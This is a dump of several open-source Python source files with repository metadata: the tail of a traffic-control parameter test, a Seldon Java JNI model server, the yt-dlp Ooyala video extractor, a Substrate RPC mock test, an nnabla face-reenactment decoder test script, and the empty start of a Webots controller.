n=3,
)
],
)
def test_normal(
self,
device_option,
rate,
direction,
delay,
delay_distro,
loss,
duplicate,
corrupt,
src_network,
exclude_src_network,
dst_network,
exclude_dst_network,
src_port,
exclude_src_port,
dst_port,
exclude_dst_port,
shaping_algorithm,
):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
direction=direction,
netem_param=NetemParameter(
device=device_option,
bandwidth_rate=rate,
latency_time=delay,
latency_distro_time=delay_distro,
packet_loss_rate=loss,
packet_duplicate_rate=duplicate,
corruption_rate=corrupt,
),
src_network=src_network,
exclude_src_network=exclude_src_network,
dst_network=dst_network,
exclude_dst_network=exclude_dst_network,
src_port=src_port,
exclude_src_port=exclude_src_port,
dst_port=dst_port,
exclude_dst_port=exclude_dst_port,
is_enable_iptables=True,
shaping_algorithm=shaping_algorithm,
)
if is_invalid_param(rate, delay, loss, duplicate, corrupt, reordering=None):
with pytest.raises(ParameterError):
tc_obj.validate()
else:
tc_obj.validate()
@pytest.mark.parametrize(
["direction", "delay", "reordering"],
[
opt_list
for opt_list in AllPairs(
[
[TrafficDirection.OUTGOING],
["0.1ms", Tc.ValueRange.LatencyTime.MAX], # delay
[MIN_REORDERING_RATE, MAX_REORDERING_RATE], # reordering
],
n=2,
)
],
)
def test_normal_reordering(self, device_option, direction, delay, reordering):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
latency_time=delay,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
reordering_rate=reordering,
),
direction=direction,
shaping_algorithm=ShapingAlgorithm.HTB,
)
tc_obj.validate()
@pytest.mark.parametrize(
["value", "expected"],
[
[{"latency_time": "-1ms"}, ParameterError],
[{"latency_time": "61min"}, ParameterError],
[{"latency_time": "100ms", "latency_distro_time": "-1ms"}, ParameterError],
[{"latency_time": "100ms", "latency_distro_time": "61min"}, ParameterError],
[{"packet_loss_rate": MIN_PACKET_LOSS_RATE - 0.1}, ParameterError],
[{"packet_loss_rate": MAX_PACKET_LOSS_RATE + 0.1}, ParameterError],
[
{"latency_time": "100ms", "packet_duplicate_rate": MIN_PACKET_DUPLICATE_RATE - 0.1},
ParameterError,
],
[
{"latency_time": "100ms", "packet_duplicate_rate": MAX_PACKET_DUPLICATE_RATE + 0.1},
ParameterError,
],
[{"corruption_rate": MIN_CORRUPTION_RATE - 0.1}, ParameterError],
[{"corruption_rate": MAX_CORRUPTION_RATE + 0.1}, ParameterError],
[{"reordering_rate": MIN_REORDERING_RATE - 0.1}, ParameterError],
[{"reordering_rate": MAX_REORDERING_RATE + 0.1}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0."}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.256"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0/0"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0/33"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.2/24"}, ParameterError],
[{Tc.Param.DST_NETWORK: "192.168.0.0000/24"}, ParameterError],
[{"src_port": -1}, ParameterError],
[{"src_port": 65536}, ParameterError],
[{"dst_port": -1}, ParameterError],
[{"dst_port": 65536}, ParameterError],
],
)
def test_exception(self, device_option, value, expected):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
bandwidth_rate=value.get("bandwidth_rate"),
latency_time=value.get("latency_time", Tc.ValueRange.LatencyTime.MIN),
latency_distro_time=value.get("latency_distro_time", Tc.ValueRange.LatencyTime.MIN),
packet_loss_rate=value.get("packet_loss_rate"),
packet_duplicate_rate=value.get("packet_duplicate_rate"),
corruption_rate=value.get("corruption_rate"),
),
dst_network=value.get(Tc.Param.DST_NETWORK),
src_port=value.get("src_port"),
dst_port=value.get("dst_port"),
shaping_algorithm=ShapingAlgorithm.HTB,
)
with pytest.raises(expected):
tc_obj.validate()
class Test_TrafficControl_ipv4:
@pytest.mark.parametrize(
["network", "is_ipv6", "expected_ip_ver", "expected_protocol", "expected_protocol_match"],
[
["192.168.0.1", False, 4, "ip", "ip"],
["192.168.0.0/24", False, 4, "ip", "ip"],
["::1", True, 6, "ipv6", "ip6"],
["2001:db00::0/24", True, 6, "ipv6", "ip6"],
],
)
def test_normal(
self,
device_option,
network,
is_ipv6,
expected_ip_ver,
expected_protocol,
expected_protocol_match,
):
if device_option is None:
pytest.skip("device option is null")
tc_obj = TrafficControl(
device=device_option,
netem_param=NetemParameter(
device=device_option,
latency_time=Tc.ValueRange.LatencyTime.MIN,
latency_distro_time=Tc.ValueRange.LatencyTime.MIN,
),
dst_network=network,
is_ipv6=is_ipv6,
shaping_algorithm=ShapingAlgorithm.HTB,
)
assert tc_obj.ip_version == expected_ip_ver
assert tc_obj.protocol == expected_protocol
assert tc_obj.protocol_match == expected_protocol_match
|
5d588d6f3745b566c0f0b92933c99fc2729ea437
|
86393bd0d16c69363aa1afb4c4841fff6314493c
|
/incubating/wrappers/s2i/java-jni/java-jni/JavaJNIServer.py
|
a532b76867858f2e0d016f4682d8b2ab5b1210a5
|
[
"Apache-2.0"
] |
permissive
|
SeldonIO/seldon-core
|
0179fc490c439dbc04f2b8e6157f39291cb11aac
|
6652d080ea10cfca082be7090d12b9e776d96d7a
|
refs/heads/master
| 2023-08-19T08:32:10.714354
| 2023-08-15T12:55:57
| 2023-08-15T12:55:57
| 114,898,943
| 3,947
| 885
|
Apache-2.0
| 2023-09-13T11:29:37
| 2017-12-20T14:51:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,656
|
py
|
JavaJNIServer.py
|
import os
import logging
import jpype
from seldon_core.user_model import SeldonComponent
logger = logging.getLogger(__name__)
class JavaJNIServer(SeldonComponent):
def __init__(self):
super().__init__()
self._model = None
def load(self):
"""
We can only have a single JVM per process.
More details can be found here:
https://jpype.readthedocs.io/en/latest/userguide.html#multiprocessing
"""
model_jar_path = os.getenv("JAVA_JAR_PATH")
logger.debug(f"Starting JVM with jar: {model_jar_path}")
# NOTE: convertStrings must be set to True to avoid an explosion of
# interop calls when working with the returned Java strings
jpype.startJVM(classpath=[model_jar_path], convertStrings=True)
model_import_path = os.getenv("JAVA_IMPORT_PATH")
logger.debug(f"Instantiating {model_import_path} object")
java__SeldonComponent = self._import_model(model_import_path)
self._model = java__SeldonComponent()
def _import_model(self, model_import_path: str):
packages = model_import_path.split(".")
if len(packages) < 2:
raise RuntimeError(f"Invalid Java import path: {model_import_path}")
root = packages[0]
current_package = jpype.JPackage(root)
for package in packages[1:]:
current_package = getattr(current_package, package)
return current_package
def predict_rest(self, request: bytes) -> bytes:
logger.debug("Sending request to Java model")
prediction_raw = self._model.predictRawREST(request)
return prediction_raw
|
8267f7917cd78643469ba5415c1b1a16a15e82ab
|
6c37d1d2437a08e43b13d621d4a8da4da7135b3a
|
/yt_dlp/extractor/ooyala.py
|
65afccdb1c95824c2da74fc1961bc41d805bf0e0
|
[
"Unlicense",
"GPL-2.0-or-later",
"MPL-2.0",
"BSD-3-Clause",
"GPL-3.0-or-later",
"LGPL-2.1-only",
"BSD-2-Clause",
"MIT"
] |
permissive
|
yt-dlp/yt-dlp
|
be040bde10cc40258c879c75ab30215686352824
|
d3d81cc98f554d0adb87d24bfd6fabaaa803944d
|
refs/heads/master
| 2023-09-05T21:15:21.050538
| 2023-09-05T20:35:23
| 2023-09-05T20:35:23
| 307,260,205
| 52,742
| 5,376
|
Unlicense
| 2023-09-14T05:22:08
| 2020-10-26T04:22:55
|
Python
|
UTF-8
|
Python
| false
| false
| 10,067
|
py
|
ooyala.py
|
import base64
import re
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_str,
)
from ..utils import (
determine_ext,
float_or_none,
int_or_none,
smuggle_url,
try_get,
unsmuggle_url,
)
class OoyalaBaseIE(InfoExtractor):
_PLAYER_BASE = 'http://player.ooyala.com/'
_CONTENT_TREE_BASE = _PLAYER_BASE + 'player_api/v1/content_tree/'
_AUTHORIZATION_URL_TEMPLATE = _PLAYER_BASE + 'sas/player_api/v2/authorization/embed_code/%s/%s'
def _extract(self, content_tree_url, video_id, domain=None, supportedformats=None, embed_token=None):
content_tree = self._download_json(content_tree_url, video_id)['content_tree']
metadata = content_tree[list(content_tree)[0]]
embed_code = metadata['embed_code']
pcode = metadata.get('asset_pcode') or embed_code
title = metadata['title']
auth_data = self._download_json(
self._AUTHORIZATION_URL_TEMPLATE % (pcode, embed_code),
video_id, headers=self.geo_verification_headers(), query={
'domain': domain or 'player.ooyala.com',
'supportedFormats': supportedformats or 'mp4,rtmp,m3u8,hds,dash,smooth',
'embedToken': embed_token,
})['authorization_data'][embed_code]
urls = []
formats = []
streams = auth_data.get('streams') or [{
'delivery_type': 'hls',
'url': {
'data': base64.b64encode(('http://player.ooyala.com/hls/player/all/%s.m3u8' % embed_code).encode()).decode(),
}
}]
for stream in streams:
url_data = try_get(stream, lambda x: x['url']['data'], compat_str)
if not url_data:
continue
s_url = compat_b64decode(url_data).decode('utf-8')
if not s_url or s_url in urls:
continue
urls.append(s_url)
ext = determine_ext(s_url, None)
delivery_type = stream.get('delivery_type')
if delivery_type == 'hls' or ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
re.sub(r'/ip(?:ad|hone)/', '/all/', s_url), embed_code, 'mp4', 'm3u8_native',
m3u8_id='hls', fatal=False))
elif delivery_type == 'hds' or ext == 'f4m':
formats.extend(self._extract_f4m_formats(
s_url + '?hdcore=3.7.0', embed_code, f4m_id='hds', fatal=False))
elif delivery_type == 'dash' or ext == 'mpd':
formats.extend(self._extract_mpd_formats(
s_url, embed_code, mpd_id='dash', fatal=False))
elif delivery_type == 'smooth':
self._extract_ism_formats(
s_url, embed_code, ism_id='mss', fatal=False)
elif ext == 'smil':
formats.extend(self._extract_smil_formats(
s_url, embed_code, fatal=False))
else:
formats.append({
'url': s_url,
'ext': ext or delivery_type,
'vcodec': stream.get('video_codec'),
'format_id': delivery_type,
'width': int_or_none(stream.get('width')),
'height': int_or_none(stream.get('height')),
'abr': int_or_none(stream.get('audio_bitrate')),
'vbr': int_or_none(stream.get('video_bitrate')),
'fps': float_or_none(stream.get('framerate')),
})
if not formats and not auth_data.get('authorized'):
self.raise_no_formats('%s said: %s' % (
self.IE_NAME, auth_data['message']), expected=True)
subtitles = {}
for lang, sub in metadata.get('closed_captions_vtt', {}).get('captions', {}).items():
sub_url = sub.get('url')
if not sub_url:
continue
subtitles[lang] = [{
'url': sub_url,
}]
return {
'id': embed_code,
'title': title,
'description': metadata.get('description'),
'thumbnail': metadata.get('thumbnail_image') or metadata.get('promo_image'),
'duration': float_or_none(metadata.get('duration'), 1000),
'subtitles': subtitles,
'formats': formats,
}
class OoyalaIE(OoyalaBaseIE):
_VALID_URL = r'(?:ooyala:|https?://.+?\.ooyala\.com/.*?(?:embedCode|ec)=)(?P<id>.+?)(&|$)'
_TESTS = [
{
# From http://it.slashdot.org/story/13/04/25/178216/recovering-data-from-broken-hard-drives-and-ssds-video
'url': 'http://player.ooyala.com/player.js?embedCode=pxczE2YjpfHfn1f3M-ykG_AmJRRn0PD8',
'info_dict': {
'id': 'pxczE2YjpfHfn1f3M-ykG_AmJRRn0PD8',
'ext': 'mp4',
'title': 'Explaining Data Recovery from Hard Drives and SSDs',
'description': 'How badly damaged does a drive have to be to defeat Russell and his crew? Apparently, smashed to bits.',
'duration': 853.386,
},
# The video in the original webpage now uses PlayWire
'skip': 'Ooyala said: movie expired',
}, {
# Only available for ipad
'url': 'http://player.ooyala.com/player.js?embedCode=x1b3lqZDq9y_7kMyC2Op5qo-p077tXD0',
'info_dict': {
'id': 'x1b3lqZDq9y_7kMyC2Op5qo-p077tXD0',
'ext': 'mp4',
'title': 'Simulation Overview - Levels of Simulation',
'duration': 194.948,
},
},
{
# Information available only through SAS api
# From http://community.plm.automation.siemens.com/t5/News-NX-Manufacturing/Tool-Path-Divide/ba-p/4187
'url': 'http://player.ooyala.com/player.js?embedCode=FiOG81ZTrvckcchQxmalf4aQj590qTEx',
'md5': 'a84001441b35ea492bc03736e59e7935',
'info_dict': {
'id': 'FiOG81ZTrvckcchQxmalf4aQj590qTEx',
'ext': 'mp4',
'title': 'Divide Tool Path.mp4',
'duration': 204.405,
}
},
{
# empty stream['url']['data']
'url': 'http://player.ooyala.com/player.js?embedCode=w2bnZtYjE6axZ_dw1Cd0hQtXd_ige2Is',
'only_matching': True,
}
]
def _extract_from_webpage(self, url, webpage):
mobj = (re.search(r'player\.ooyala\.com/[^"?]+[?#][^"]*?(?:embedCode|ec)=(?P<ec>[^"&]+)', webpage)
or re.search(r'OO\.Player\.create\([\'"].*?[\'"],\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'OO\.Player\.create\.apply\(\s*OO\.Player\s*,\s*op\(\s*\[\s*[\'"][^\'"]*[\'"]\s*,\s*[\'"](?P<ec>.{32})[\'"]', webpage)
or re.search(r'SBN\.VideoLinkset\.ooyala\([\'"](?P<ec>.{32})[\'"]\)', webpage)
or re.search(r'data-ooyala-video-id\s*=\s*[\'"](?P<ec>.{32})[\'"]', webpage))
if mobj is not None:
embed_token = self._search_regex(
r'embedToken[\'"]?\s*:\s*[\'"]([^\'"]+)',
webpage, 'ooyala embed token', default=None)
yield self._build_url_result(smuggle_url(
mobj.group('ec'), {
'domain': url,
'embed_token': embed_token,
}))
return
# Look for multiple Ooyala embeds on SBN network websites
mobj = re.search(r'SBN\.VideoLinkset\.entryGroup\((\[.*?\])', webpage)
if mobj is not None:
for v in self._parse_json(mobj.group(1), self._generic_id(url), fatal=False) or []:
yield self._build_url_result(smuggle_url(v['provider_video_id'], {'domain': url}))
@staticmethod
def _url_for_embed_code(embed_code):
return 'http://player.ooyala.com/player.js?embedCode=%s' % embed_code
@classmethod
def _build_url_result(cls, embed_code):
return cls.url_result(cls._url_for_embed_code(embed_code),
ie=cls.ie_key())
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
embed_code = self._match_id(url)
domain = smuggled_data.get('domain')
supportedformats = smuggled_data.get('supportedformats')
embed_token = smuggled_data.get('embed_token')
content_tree_url = self._CONTENT_TREE_BASE + 'embed_code/%s/%s' % (embed_code, embed_code)
return self._extract(content_tree_url, embed_code, domain, supportedformats, embed_token)
class OoyalaExternalIE(OoyalaBaseIE):
_VALID_URL = r'''(?x)
(?:
ooyalaexternal:|
https?://.+?\.ooyala\.com/.*?\bexternalId=
)
(?P<partner_id>[^:]+)
:
(?P<id>.+)
(?:
:|
.*?&pcode=
)
(?P<pcode>.+?)
(?:&|$)
'''
_TEST = {
'url': 'https://player.ooyala.com/player.js?externalId=espn:10365079&pcode=1kNG061cgaoolOncv54OAO1ceO-I&adSetCode=91cDU6NuXTGKz3OdjOxFdAgJVtQcKJnI&callback=handleEvents&hasModuleParams=1&height=968&playerBrandingId=7af3bd04449c444c964f347f11873075&targetReplaceId=videoPlayer&width=1656&wmode=opaque&allowScriptAccess=always',
'info_dict': {
'id': 'FkYWtmazr6Ed8xmvILvKLWjd4QvYZpzG',
'ext': 'mp4',
'title': 'dm_140128_30for30Shorts___JudgingJewellv2',
'duration': 1302.0,
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
partner_id, video_id, pcode = self._match_valid_url(url).groups()
content_tree_url = self._CONTENT_TREE_BASE + 'external_id/%s/%s:%s' % (pcode, partner_id, video_id)
return self._extract(content_tree_url, video_id)
|
2e6a7778b2ccb30e66bdb46a711c632f8bfb24bd
|
0d814eb8f2bfef32381834a9fcc8a1e9dbff48d9
|
/test/test_rpc_compatibility.py
|
12138de58a7b7d1e3b78ae07746c3927365795e5
|
[
"Apache-2.0"
] |
permissive
|
polkascan/py-substrate-interface
|
cdc71e44dd9208bce5771cbe1fd9be97bc9e5d18
|
111ff53e23b419cb756146e3d6037a8a6da341eb
|
refs/heads/master
| 2023-08-31T19:27:26.715840
| 2023-08-18T13:42:12
| 2023-08-18T13:42:12
| 180,998,078
| 221
| 109
|
Apache-2.0
| 2023-08-27T16:18:15
| 2019-04-12T11:52:31
|
Python
|
UTF-8
|
Python
| false
| false
| 11,188
|
py
|
test_rpc_compatibility.py
|
# Python Substrate Interface Library
#
# Copyright 2018-2023 Stichting Polkascan (Polkascan Foundation).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
from unittest.mock import MagicMock
from scalecodec.type_registry import load_type_registry_file
from test import settings
from scalecodec.exceptions import RemainingScaleBytesNotEmptyException
from substrateinterface import SubstrateInterface
from scalecodec.base import ScaleBytes
from scalecodec.types import Vec, GenericAddress
class RPCCompatilibityTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.metadata_fixture_dict = load_type_registry_file(
os.path.join(os.path.dirname(__file__), 'fixtures', 'metadata_hex.json')
)
cls.substrate = SubstrateInterface(url='dummy', ss58_format=42, type_registry_preset='substrate-node-template')
metadata_decoder = cls.substrate.runtime_config.create_scale_object(
'MetadataVersioned', ScaleBytes(cls.metadata_fixture_dict['V14'])
)
metadata_decoder.decode()
cls.substrate.get_block_metadata = MagicMock(return_value=metadata_decoder)
def mocked_query(module, storage_function, block_hash):
if module == 'Session' and storage_function == 'Validators':
if block_hash == '0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93':
vec = Vec()
author = GenericAddress()
author.value = '5GNJqTPyNqANBkUVMN1LPPrxXnFouWXoe2wNSmmEoLctxiZY'
vec.elements = [author]
return vec
raise ValueError(f"Unsupported mocked query {module}.{storage_function} @ {block_hash}")
def mocked_request(method, params, result_handler=None):
if method in ['chain_getBlockHash', 'chain_getHead', 'chain_getFinalisedHead', 'chain_getFinalizedHead']:
return {
"jsonrpc": "2.0",
"result": "0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93",
"id": 1
}
elif method in ['chain_getRuntimeVersion', 'state_getRuntimeVersion']:
return {
"jsonrpc": "2.0",
"result": {"specVersion": 100, "transactionVersion": 1},
"id": 1
}
elif method == 'chain_getHeader':
return {
"jsonrpc": "2.0",
"result": {
"digest": {
"logs": ['0x066175726120afe0021000000000', '0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989']
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": 3158840,
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
},
"id": 1
}
elif method == 'chain_getBlock':
# Correct
if params[0] == '0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93':
return {
"jsonrpc": "2.0",
"result": {
"block": {
"extrinsics": ['0x280403000b695f47ff8601'],
"header": {
"digest": {'logs': [{'preRuntime': ['0x6e6d6273', '0x6a3f02ac48ee3080aa304fe6c336d6c75b302e08041a5c1d6a9a30541f51b618']}, {'preRuntime': ['0x72616e64', '0xe468581da52a51330797c9f5762d98a241f28b3bde9017307e15cfc9a6ebb6741e7da1282681401b26752a04073ea98335005699817e546db343b457fcc7150cdf9edabb3a7b8e35acd6e763235c9ce415bdb0a22d98024cb6410beeb74d3903']}, {'consensus': ['0x66726f6e', '0x019ad160fc5080a49795f34607dadc267a0a0485dc0e6fa46c0ded42ac102a92813090c50b4ff02aed1ca173df1f8915d9872e47a6c3c71a0a32d36d342d6c00ab9f50a496f171bad265ab5a3512568e1234cdab03f7ee1a98ce6e489d5726deed3c125f5c342d0662ccfcea93d2c34c35f328b183af68502ea9e2a72e83522dd7f884ac7a067b4e5cfae4766fd0b2159809cbe3d1af7eb1747c1a3e675982bd9312b90c5020048fef1349759f22b20a919af96ae7270dd40614eb7345ce35beff07980cb675de6be9bafd8fd2e2322cd2fce6f24d0a23c8a68adcced46da0be3b280ead3a25348bb9e6f7a90aac0a2d8a3d8badcb94c3929a5fd898146ecfd361b39de60b7a194a6e4751aa8b54c435a7a9a6af274700b870528ff0780f6ca63ba7449d5534fb786e33900b30966970f29db6310244860409dd6af96a09f9b82946d3f47a61c3bfb21a43e257b3ddf56d07ce8bfdbcb2c277eca96ebe95a8042ec0faf5d65a20505c1562aba4bde857552766320c61fd748c260a0c334a4bfec1ffedbb288cc8bd3348e4c48bd67118ce3936e3fc67b90aeebab97dbda0f6cfeb7e']}, {'seal': ['0x6e6d6273', '0x561e0be2c6f495f326fbc1bf67943f5ff087133d42860fb1dbe8f260deb4570110e1aab58f6f4064ec1839b351987489bf027e274ae593b52c88d99ae6b92f8e']}]},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
}
},
"justification": None
},
"id": 1
}
# Raises decoding errors
elif params[0] == '0x40b98c29466fa76eeee21008b50d5cb5d7220712ead554eb97a5fd6ba4bc31b5':
return {
"jsonrpc": "2.0",
"result": {
"block": {
"extrinsics": [
"0x240402000b9405724377",
"0x280402100b940572437701",
"0x280402000b940572437701",
"0x280402000c940572437701",
],
"header": {
"digest": {
"logs": [
"0x066175726120afe0021000000000",
"0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989"
]
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
}
},
"justification": None
},
"id": 1
}
elif method == 'state_getStorageAt':
return {'jsonrpc': '2.0', 'result': '0x04be5ddb1579b72e84524fc29e78609e3caf42e85aa118ebfe0b0ad404b5bdd25f', 'id': 11}
elif method == 'chain_subscribeNewHeads':
return result_handler({
"jsonrpc": "2.0",
"params": {
"result": {
"digest": {
"logs": ['0x066175726120afe0021000000000', '0x05617572610101567be3d55b4885ce3ac6a7b46b28adf138299acc3eb5f11ffa15c3ed0551f22b7220ec676ea947cd6c8daa6fcfa351b11e62651e6e06f5dde59bb566d36e6989']
},
"extrinsicsRoot": "0xeaa9cd48b36a88ba7cf934cdbcd8f2afc0843978912452529ace7ef2da09691d",
"number": "0x67",
"parentHash": "0xf33015565b9978d146cdf648c498649b04c323cd35d9f55fad7d8586d4b42ea2",
"stateRoot": "0xa8b0c74dbf09ee9ff5443076f8298027e3a6505ab6e3f6a683a7d4d137130683"
},
"subscription": 'test1'
}
}, 0, 'test1')
elif method == 'chain_unsubscribeNewHeads':
return {
"jsonrpc": "2.0",
"result": True
}
elif method == 'rpc_methods':
return {
"jsonrpc": "2.0",
"result": {"methods": ['author_submitExtrinsic', 'author_submitAndWatchExtrinsic', 'author_unwatchExtrinsic', 'author_pendingExtrinsics', 'chain_getBlockHash', 'chain_getHeader', 'chain_getBlock', 'chain_getFinalizedHead', 'chain_subscribeNewHead', 'chain_subscribeFinalizedHeads', 'chain_unsubscribeNewHead', 'chain_subscribeNewHeads', 'chain_unsubscribeNewHeads', 'chain_unsubscribeFinalizedHeads', 'state_getRuntimeVersion', 'state_getMetadata', 'state_getStorage', 'state_getKeysPaged', 'state_queryStorageAt', 'state_call', 'state_subscribeRuntimeVersion', 'state_unsubscribeRuntimeVersion', 'state_subscribeStorage', 'state_unsubscribeStorage', 'system_localPeerId', 'system_nodeRoles', 'system_localListenAddresses', 'system_chain', 'system_properties', 'system_name', 'system_version', 'system_chainType', 'system_health', 'system_dryRun', 'system_accountNextIndex', 'payment_queryFeeDetails', 'payment_queryInfo', 'dev_newBlock', 'dev_setStorage', 'dev_timeTravel', 'dev_setHead', 'dev_dryRun', 'rpc_methods']},
"id": 1
}
raise ValueError(f"Unsupported mocked method {method}")
cls.substrate.rpc_request = MagicMock(side_effect=mocked_request)
cls.substrate.query = MagicMock(side_effect=mocked_query)
def test_get_block_by_head(self):
block = self.substrate.get_block()
self.assertEqual('0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93', block['header']['hash'])
def test_get_chain_head(self):
block_hash = self.substrate.get_chain_head()
self.assertEqual('0xec828914eca09331dad704404479e2899a971a9b5948345dc40abca4ac818f93', block_hash)
if __name__ == '__main__':
unittest.main()
|
927d6b64b830bf18d51b3a195305e1bf7ad7b4b3
|
d6aae799e18e907fb413b715200c7832252a87e5
|
/facial-motion-transfer/reenactgan/test_decoder.py
|
ceb44bab90a5835d8f5cf8bc3bf09fa787daa8b4
|
[
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0",
"CC-BY-NC-4.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
sony/nnabla-examples
|
0d0bbd5df3028996e790bcf07248fdb0932697d1
|
41f71faa6efff7774a76bbd5af3198322a90a6ab
|
refs/heads/master
| 2023-09-04T03:45:54.023899
| 2023-08-22T03:31:21
| 2023-08-22T03:31:21
| 109,625,584
| 308
| 108
|
Apache-2.0
| 2023-08-22T03:31:23
| 2017-11-05T23:30:40
|
Python
|
UTF-8
|
Python
| false
| false
| 4,593
|
py
|
test_decoder.py
|
# Copyright 2020,2021 Sony Corporation.
# Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import glob
import argparse
import nnabla as nn
import nnabla.logger as logger
import nnabla.monitor as nm
import data
import models
from utils import combine_images
from config import load_decoder_config
def test(config, netG, train_iterator, monitor, param_file):
# Load image and boundary image to get Variable shapes
img, bod_map, bod_map_resize = train_iterator.next()
real_img = nn.Variable(img.shape)
real_bod_map = nn.Variable(bod_map.shape)
real_bod_map_resize = nn.Variable(bod_map_resize.shape)
################### Graph Construction ####################
# Generator
with nn.parameter_scope('netG_decoder'):
fake_img = netG(real_bod_map, test=False)
fake_img.persistent = True
# load parameters of networks
with nn.parameter_scope('netG_decoder'):
nn.load_parameters(param_file)
monitor_vis = nm.MonitorImage(
'result', monitor, interval=config["test"]["vis_interval"], num_images=4, normalize_method=lambda x: x)
# Test
i = 0
iter_per_epoch = train_iterator.size // config["test"]["batch_size"] + 1
if config["num_test"]:
num_test = config["num_test"]
else:
num_test = train_iterator.size
for _ in range(iter_per_epoch):
img, bod_map, bod_map_resize = train_iterator.next()
real_img.d = img
real_bod_map.d = bod_map
real_bod_map_resize.d = bod_map_resize
# Generate fake image
fake_img.forward(clear_buffer=True)
i += 1
images_to_visualize = [real_bod_map_resize.d, fake_img.d, img]
visuals = combine_images(images_to_visualize)
monitor_vis.add(i, visuals)
if i > num_test:
break
def main():
parser = argparse.ArgumentParser()
parser.add_argument('config', default=None, type=str)
parser.add_argument('--param-file', default=None, type=str)
parser.add_argument('--num-test', '-n', default=None, type=int)
args = parser.parse_args()
param_file = args.param_file
config = load_decoder_config(args.config)
config["num_test"] = args.num_test
#########################
# Context Setting
# Get context.
from nnabla.ext_utils import get_extension_context
logger.info(f'Running in {config["context"]}.')
ctx = get_extension_context(
config["context"], device_id=config["device_id"])
nn.set_default_context(ctx)
#########################
# Data Loading
logger.info('Initialing Datasource')
train_iterator = data.celebv_data_iterator(dataset_mode="decoder",
celeb_name=config["trg_celeb_name"],
data_dir=config["train_dir"],
ref_dir=config["ref_dir"],
mode="test",
batch_size=config["test"]["batch_size"],
shuffle=False,
with_memory_cache=config["test"]["with_memory_cache"],
with_file_cache=config["test"]["with_file_cache"],
)
monitor = nm.Monitor(os.path.join(
config["test"]["logdir"], "decoder", config["trg_celeb_name"], config["experiment_name"]))
# Network
netG = models.netG_decoder
if not param_file:
param_file = sorted(glob.glob(os.path.join(
config["logdir"],
"decoder",
config["trg_celeb_name"],
config["experiment_name"],
"netG_*")), key=os.path.getmtime)[-1]
test(config, netG, train_iterator, monitor, param_file)
if __name__ == '__main__':
main()
|
47165dbf6d7f25b249aa557268ce036ff0cdc0b4
|
e8b04bef9aa1ac8e2c109dd315f133c8f4d28ae6
|
/projects/samples/devices/controllers/camera_segmentation/camera_segmentation.py
|
b3b4530e47bbd7b4566917f369c30c87036505ae
|
[
"Apache-2.0"
] |
permissive
|
cyberbotics/webots
|
f075dacf4067e8dcebbfd89e8690df8525f6d745
|
8aba6eaae76989facf3442305c8089d3cc366bcf
|
refs/heads/master
| 2023-08-31T09:41:13.205940
| 2023-08-18T10:48:30
| 2023-08-18T10:48:30
| 156,228,018
| 2,495
| 1,525
|
Apache-2.0
| 2023-08-28T16:30:33
| 2018-11-05T14:09:10
|
C++
|
UTF-8
|
Python
| false
| false
| 2,091
|
py
|
camera_segmentation.py
|
